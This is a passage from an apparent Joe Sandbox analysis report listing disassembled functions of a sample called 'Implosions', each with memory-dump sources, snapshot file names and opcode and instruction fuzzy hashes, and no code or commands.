              • Instruction ID: ab7bbc0516ead3bc67164a9ed5918bfb5207bd90482f75ca79f0a8b173cf66d8
              • Opcode Fuzzy Hash: 3a41c880159bec2885023b16f0b36f36cc86031a1c06ee6750f8004c8ae6def4
              • Instruction Fuzzy Hash: 5C11A5317006199FCB10EF55D89496FBBB6FF84310B448929E806AB350CB31ED45DBA0
              Function 05CECCC3 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ae906f5e0bcbf84a9f9db770e4433bb9c3754a85849af7304cd2d5b871149283
              • Instruction ID: d1ce08b1eb4f18e9ea3ab03e766b26454acb82157f0b910bcea7d7061c0ec191
              • Opcode Fuzzy Hash: ae906f5e0bcbf84a9f9db770e4433bb9c3754a85849af7304cd2d5b871149283
              • Instruction Fuzzy Hash: FC112B31D0020ACFCB45EFA8D8449AEBBB6FF44304F108569D919AB364EB74AE41CF80
              Function 05CE9240 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ec397f4356f85f3cb7c7d897596133d2513754e1b21f3276e7d9f6da6bed1c36
              • Instruction ID: d88af1ae6c221a03543424e764f702719020c29c823679d01a2868f472d96c5f
              • Opcode Fuzzy Hash: ec397f4356f85f3cb7c7d897596133d2513754e1b21f3276e7d9f6da6bed1c36
              • Instruction Fuzzy Hash: 0601F2767042042FD745A7689894FAFBBEBDF89260F484859F608CB380DE61EC01D7E4
              Function 05CECCC8 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b6dcbc10a8229fcaaca440e22a70eb3cef8a96c60f648465867bd210a677d469
              • Instruction ID: cd0b42d885edc0abe815b98d10c65e18be0a801f2101588dac6e0e3aea2b2661
              • Opcode Fuzzy Hash: b6dcbc10a8229fcaaca440e22a70eb3cef8a96c60f648465867bd210a677d469
              • Instruction Fuzzy Hash: B511FB30D4420ACFCB45EFA9D8449AEBBB6FF44304F108569D559AB364EB74AE51CF80
              Function 05DEFD8F Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 58b6aee5bb2054a92a4f2f9494061adfe99d97d50f3d5dbf3d9a7ebdbe487a47
              • Instruction ID: 5fecef1a7301de9d73e0c06273c78fcfcae0ecb9c4ddf2cca750d0ded712939b
              • Opcode Fuzzy Hash: 58b6aee5bb2054a92a4f2f9494061adfe99d97d50f3d5dbf3d9a7ebdbe487a47
              • Instruction Fuzzy Hash: 77112671706741AFC7216B28A458B9A7F62FB81310F94486FE08287381CF759846CF55
              Function 05DE648F Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c8ba9f53a79a5d973a4da525676a38ac19c90b97d8b94621a80b7d9b6a5627bd
              • Instruction ID: 8e7a0fc74f47fcf3b0b2bceab7b12d56d32179b31928eca34e1f60e36100f60e
              • Opcode Fuzzy Hash: c8ba9f53a79a5d973a4da525676a38ac19c90b97d8b94621a80b7d9b6a5627bd
              • Instruction Fuzzy Hash: 9701F531B05354AFCB25AB35B8146BABBA6EFC1710B44447ED4028B284DE70E805C7A4
              Function 05CAE238 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14071b5b8840debc2379cdf95e18a72cc631d08f389a26a70aa00a29a8e04343
              • Instruction ID: bf9ed88dc5b315807632648c5f2b96ce1c863107fe7b0ce21e0b668d2bd80711
              • Opcode Fuzzy Hash: 14071b5b8840debc2379cdf95e18a72cc631d08f389a26a70aa00a29a8e04343
              • Instruction Fuzzy Hash: 56012632B013016BC3155A75D490A677FAAEFC5618B64883DE50A87341DE35EC46CBD0
              Function 05CACCF3 Relevance: .0, Instructions: 48COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b9b38d559a8babba3db309e9235663e8f712346ad445361a934324fca9337401
              • Instruction ID: 84fea67aa06f47ed03c2c555845627922b7ae6159e84c6399f86b361810a8826
              • Opcode Fuzzy Hash: b9b38d559a8babba3db309e9235663e8f712346ad445361a934324fca9337401
              • Instruction Fuzzy Hash: 8801A7367015118FCB155A58D489B2AFFEBEFC4264B188556FD06C7354CF74DC028AE4
              Function 05DE5AB0 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 06627931967a982ac844e8ef69f85d77a43eec37f918c6cc9099d8b3f092c2dd
              • Instruction ID: a9ffabe14aeeef907bab2a6608b8426735bfcc2acf7355bd3de23a98bbdc673e
              • Opcode Fuzzy Hash: 06627931967a982ac844e8ef69f85d77a43eec37f918c6cc9099d8b3f092c2dd
              • Instruction Fuzzy Hash: B0F0A9317043006F8320AB9EB4D05AEF7D6EFC4660390897FD10ECB751C961BC055BA5
              Function 020BD006 Relevance: .0, Instructions: 47COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2910034568.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_20bd000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3c97a8f9922b49a025698b1dcd1a0ed5b94a1a5ec36614603b85d98d5db3cfd6
              • Instruction ID: da88f6f28676c591c76931923e0dc7ffd37e9120b9c218b458a0dc564ab40dd8
              • Opcode Fuzzy Hash: 3c97a8f9922b49a025698b1dcd1a0ed5b94a1a5ec36614603b85d98d5db3cfd6
              • Instruction Fuzzy Hash: 5F01297140D3809FD7138B258894792BFB8EF47224F1985DBE9888F1A7C2699C45DB72
              Function 05CE9250 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22b92f02a92ec27476ebf92bf37ab89410c839a8240440c3efa0949fc7c9d8fa
              • Instruction ID: 2a52cd89f217b8ba5ae9b6c4a11568351205ab5f071274f989104516a78e4a31
              • Opcode Fuzzy Hash: 22b92f02a92ec27476ebf92bf37ab89410c839a8240440c3efa0949fc7c9d8fa
              • Instruction Fuzzy Hash: 9CF0D1323001042B9644A6A89890E7FBBEBDF882A0B548819F908CB380DE61EC0193E4
              Function 05CAA820 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9f5b6dba3fcb49bad1e900997d012118004b3f821d6935ea127e336176ec0fc4
              • Instruction ID: 23de285313880dd622b9e2e82b3a6a7439026df45320f47215f02b0b2d21ff58
              • Opcode Fuzzy Hash: 9f5b6dba3fcb49bad1e900997d012118004b3f821d6935ea127e336176ec0fc4
              • Instruction Fuzzy Hash: 8401A2357101046FC7159B99A898B6E7FEAEFC86A0B584019F909C7340CF719C01C7A0
              Function 05D631B8 Relevance: .0, Instructions: 46COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5814924ac5fd0dd5570aecb5ba73791772c0aa574e32354706c7ebe20b4076d4
              • Instruction ID: 4c565ee7b96b55550144b9c4f16d8cfb14d0dfa0cb9e3e8184fb21aa4325b9e0
              • Opcode Fuzzy Hash: 5814924ac5fd0dd5570aecb5ba73791772c0aa574e32354706c7ebe20b4076d4
              • Instruction Fuzzy Hash: 7E01A439B012108FDB149A69D804B667BD6FF84A95F0488ABF80AC7761EF76DC058B90
              Function 05DE9508 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1f9da9cb7bf9a798e1105844165c8fa037379713f6e2ed0f6c86bc1b10af0805
              • Instruction ID: 8e6d37d88657100b2083575e8b1c1b40b21b9395febfc11daedbe4d727fba8e5
              • Opcode Fuzzy Hash: 1f9da9cb7bf9a798e1105844165c8fa037379713f6e2ed0f6c86bc1b10af0805
              • Instruction Fuzzy Hash: 43019231A052198BDF24DB68C954BEEBBF6BF88300F54542AD442B7780DF74AD45CBA0
              Function 020BD01D Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2910034568.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_20bd000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c6ff3e24825eaed03f2931ca883e02646f8297d16b32e6e30952cfb60add2387
              • Instruction ID: 80ce835d6918d3c0353181f82d9ccda556af9d9d000707e6c850b49fe707bb5e
              • Opcode Fuzzy Hash: c6ff3e24825eaed03f2931ca883e02646f8297d16b32e6e30952cfb60add2387
              • Instruction Fuzzy Hash: 5F01DB714093449AE7324E25CDC47A7FFD8DF45324F18C52AED484B246C379D841D6B1
              Function 05CAAF08 Relevance: .0, Instructions: 45COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: be4c07e84ae4a6d1c48b3194cc1987f37a91c1427669d8eb75d2e7b5775a56e8
              • Instruction ID: 45cb20a1ac9cb6ec88b02dbf27d90f91988e998af1868a1e9f4cfedb52c14035
              • Opcode Fuzzy Hash: be4c07e84ae4a6d1c48b3194cc1987f37a91c1427669d8eb75d2e7b5775a56e8
              • Instruction Fuzzy Hash: A401A2367101158B8B14DBA9E8089AEBBFAEFC8261700847AE81AD7340DB30D900CBA0
              Function 05CE39AB Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7f0c4841ecd3393c41f07656901fc0805a049db3878f3d8ed4e19f69679ec860
              • Instruction ID: 16572c7ee14735149a2729989874e112e423edcfe4ed1837dc762a7599806aff
              • Opcode Fuzzy Hash: 7f0c4841ecd3393c41f07656901fc0805a049db3878f3d8ed4e19f69679ec860
              • Instruction Fuzzy Hash: 3C016D35A041588FCB04DB99C985ADDBBF5BF4C710F1984A9E402F7361CB35AD40CBA0
              Function 05CAB9A8 Relevance: .0, Instructions: 44COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa2e67aeeaf966df28b2d01d80e333a76ad55fe4dac5beeb9442d08953c871eb
              • Instruction ID: fa97666e08647eeaa5ebda9cc711998f0c90b6f8c9ba979bacfe271331305231
              • Opcode Fuzzy Hash: aa2e67aeeaf966df28b2d01d80e333a76ad55fe4dac5beeb9442d08953c871eb
              • Instruction Fuzzy Hash: E501B1316093868FDB05EB74D4646697FF5EF41208B1848EAE406C7255EF31DE05C751
              Function 05DE64A0 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a63bc019988206f232512e2120c677e7e4fa510af53881acd7d4c5aa3d8591a8
              • Instruction ID: 94245f694884f057cc51ce3543e54bfcca2221a50727522222455d78617b7352
              • Opcode Fuzzy Hash: a63bc019988206f232512e2120c677e7e4fa510af53881acd7d4c5aa3d8591a8
              • Instruction Fuzzy Hash: F301D131B00315AFCB64EB75B41467EBBA6FFC1611B40497EE4028B388DE70E809CBA4
              Function 05CAD960 Relevance: .0, Instructions: 43COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd5ee69c7dd5cd5a637bf60cad3c827c0b78943fbeedeb87116a2c66bcdf2a91
              • Instruction ID: aeb170ff9437fd72b133dc8ac072a14ed1e91afe3c6864cf5c4892dfe26ebd6b
              • Opcode Fuzzy Hash: dd5ee69c7dd5cd5a637bf60cad3c827c0b78943fbeedeb87116a2c66bcdf2a91
              • Instruction Fuzzy Hash: CDF03172E11118ABCB04DBA9DC05BEEBBF9EBCC610F04C566E215D7240DB3155168BA0
              Function 05CE0D8F Relevance: .0, Instructions: 42COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 15fe2636456e894c63fb00a8ff3b80edccb19d53526f12739b5ed7939cb915e2
              • Instruction ID: 3fbdb4fc396eba96b5067e3ac4b33d3d5bba5da96527099942b934b2ffd3e1f5
              • Opcode Fuzzy Hash: 15fe2636456e894c63fb00a8ff3b80edccb19d53526f12739b5ed7939cb915e2
              • Instruction Fuzzy Hash: 2D11AC35A44209CFDF14DFA5E998AED77B2FF48701F108868D442BB291CBB89954CFA0
              Function 05DEF580 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ee24875ef69ecea3a4be4cfc504453f4a2688a9b2a93989646b22d88bcc7f717
              • Instruction ID: 67a71db5edaf91cc3fe18c03ea07ce1164c93a908747f6e94cd2fb1dfed74438
              • Opcode Fuzzy Hash: ee24875ef69ecea3a4be4cfc504453f4a2688a9b2a93989646b22d88bcc7f717
              • Instruction Fuzzy Hash: 80F0CD76A10B115BD718AB3DF8152AE7AAAEFD9211F04452BF006E7340EE71E8025B99
              Function 05DEE9F0 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7652cefbf7b222f8bb99c22c9b244898d47730b9d5f485940fd50f3aa38cf50
              • Instruction ID: 393e83f4dfd06451662c4d01a889c36d292d7e7bf2930bd3677b2a334b3fff4b
              • Opcode Fuzzy Hash: e7652cefbf7b222f8bb99c22c9b244898d47730b9d5f485940fd50f3aa38cf50
              • Instruction Fuzzy Hash: 6501F530E083499BDF10EB79D80A3AE7FB5FB05304F04402AE051B7295DB795544CF51
              Function 05D62550 Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a74c00afb89a9f6279f18812c633fcb3ef242794010ed8f622fc6800806ea38b
              • Instruction ID: 76b74cce2c40739fcd6a929d8ad7bf10573fc5020a841d784a85cf3125e02547
              • Opcode Fuzzy Hash: a74c00afb89a9f6279f18812c633fcb3ef242794010ed8f622fc6800806ea38b
              • Instruction Fuzzy Hash: 8A0126397146544FCB209F28E818A9E7BE6BF88701F0500AFE4469B351DF71EC058B91
              Function 05CECAC8 Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 72e52833f171ac1b5a715e981cc3440affb7e4e7d045a025ae6656ef415f7d61
              • Instruction ID: 4a11499ce704dad18bfef40eb396c930d21b7a1f94979c1ce4c307bf998e0fc2
              • Opcode Fuzzy Hash: 72e52833f171ac1b5a715e981cc3440affb7e4e7d045a025ae6656ef415f7d61
              • Instruction Fuzzy Hash: 17015A35D0425ACFDF10DFAAE8057AEBBF5FB44300F044935D411B62A4DBB82A55CAA1
              Function 05DED378 Relevance: .0, Instructions: 40COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f7e37d8698461c5f58d1b3a02dde75b21ad7b8da8f1cee2e3d9e425e09421448
              • Instruction ID: 92824553e6762920b282d82a6e31a8d94cd91988d40d5b3161e74ed81f95b417
              • Opcode Fuzzy Hash: f7e37d8698461c5f58d1b3a02dde75b21ad7b8da8f1cee2e3d9e425e09421448
              • Instruction Fuzzy Hash: AF01D6352142109FD710EB5CE84879ABBA6FF84311F10853AE40AC7791CB7068088B94
              Function 05CEDEA0 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83ded2e5cdb2066fbefb391e9d07972e0e7ec3ce6758470979045c9ad1caf74e
              • Instruction ID: acedd62bef7fb537cb77ba7d25d635e6d15158da7c73aa63e01160b438ca0c3e
              • Opcode Fuzzy Hash: 83ded2e5cdb2066fbefb391e9d07972e0e7ec3ce6758470979045c9ad1caf74e
              • Instruction Fuzzy Hash: 7B017C70E043099FDB50EF68E41A3AE7FB1AB01304F5449A9E486D7685DBB41504DF92
              Function 05CEABEB Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4b9cd0ce6810414e9335fb49379f0b4b039c9af6c797a10626a6c1b4f3041e2a
              • Instruction ID: 1058f82b8fb910702c08861f93cadfdfc95f1148c93b527d79de81e0b44513a6
              • Opcode Fuzzy Hash: 4b9cd0ce6810414e9335fb49379f0b4b039c9af6c797a10626a6c1b4f3041e2a
              • Instruction Fuzzy Hash: E6F0C231A002096FCB10AA69EC44B9EBBF9EF88310F600429E619E7380D73069188BA1
              Function 05DEFE97 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912325881.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5de0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8538b4ef101479a71bff12fd3ed044bbe9d8123a1360370d0397f3f609b693d3
              • Instruction ID: 5f0bbe88b75985ca9177c2d6585359fee21454f224356463215f85bdc05ce020
              • Opcode Fuzzy Hash: 8538b4ef101479a71bff12fd3ed044bbe9d8123a1360370d0397f3f609b693d3
              • Instruction Fuzzy Hash: 84014B75A046598FCB04DF9AD4858CEBFF2EF8C320F58906AE405A7361D730A885CF60
              Function 05CA5020 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b815374086191ac9067409954d216102ca6a8f881459cb22512cc2a169abb647
              • Instruction ID: ab7340757faa00e9261088a6a3989da3be5b8f225fb4a0a143433dcc6ff8e7ba
              • Opcode Fuzzy Hash: b815374086191ac9067409954d216102ca6a8f881459cb22512cc2a169abb647
              • Instruction Fuzzy Hash: BBF02432B902115FEB15A6B8B809BFA3E5AEB81711F144425F5478B2C4CEB19C80C7E8
              Function 05CA6DEF Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d7099802bf1f2221f7eaee3074779387c04f1ac4cca3e9969ae18ade9d20f68c
              • Instruction ID: e41c66de2e397abef6b4ccd6ee7235cad954086fc734b2a94045bcc59ac02215
              • Opcode Fuzzy Hash: d7099802bf1f2221f7eaee3074779387c04f1ac4cca3e9969ae18ade9d20f68c
              • Instruction Fuzzy Hash: C8F0FF32B002258BCF246AB8E4193AABFF5EF40256F4848A9E805C3241EB30A911CB80
              Function 05CA4F9F Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2911970936.0000000005CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ca0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: addd55d93e902d283815c184894ec154920babd613646e1b4a8867327d421d97
              • Instruction ID: 78d43bb2f9e5152129552cee7b22861424e6f16b74248c3ad9d87285bf7cea1f
              • Opcode Fuzzy Hash: addd55d93e902d283815c184894ec154920babd613646e1b4a8867327d421d97
              • Instruction Fuzzy Hash: D1F0A4367002029BEB24DAA4A55577E7B63EFC0715F044929E50697280DF7199068BA1
              Function 05D64DE0 Relevance: .0, Instructions: 38COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e6eb46f50d4497135285d376577bc53501d04381d56e767d3ebebc3a3fec0c05
              • Instruction ID: 51ecc204bed11c1517728a9ff42ed424fc69fb77d2b0d872bf2da5a42149a5ff
              • Opcode Fuzzy Hash: e6eb46f50d4497135285d376577bc53501d04381d56e767d3ebebc3a3fec0c05
              • Instruction Fuzzy Hash: 9D012F70A043099FCB41EF68C842BAE7FB6FB02308F44849AE025A7386CFB49105CB80
              Function 05CE871B Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cfb8f7c4f9006cc5f2c7fed783a8d5c388261222dd0862f6f549fb2ba45b37dd
              • Instruction ID: 340d7bd96c3eba4087e1566548f295eaad71e32d471f83bf064dc5cd4afc646f
              • Opcode Fuzzy Hash: cfb8f7c4f9006cc5f2c7fed783a8d5c388261222dd0862f6f549fb2ba45b37dd
              • Instruction Fuzzy Hash: 98F0AF302003049FCB65DB25E980AA6F7A6FF81355B549A7CD4094BB55DB31F849CBA1
              Function 05CECABB Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912069542.0000000005CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5ce0000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3dc17570563df993154b50981da656508483a129fa5ec9478d7a36f0b6eb2b08
              • Instruction ID: 2f1397496fb0d2a71680caf3ce550f120186c810f8629037713ec8907c1a2f99
              • Opcode Fuzzy Hash: 3dc17570563df993154b50981da656508483a129fa5ec9478d7a36f0b6eb2b08
              • Instruction Fuzzy Hash: A5017C75D0425ACEDF10DFA9D9057AEBBF1FB04300F484829D411BA2A5DBB85A45CB61
              Function 05D63B18 Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2912260355.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5d60000_Implosions.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b903f435db039c8b018b4db634a3fc8a665f08c13aa80a8e379dab9abd6a1c19
              • Instruction ID: b1fd4156dcc3efc5f04b5c437c6e41fc1950c7e2abe790b53a05bed81b7d15a1
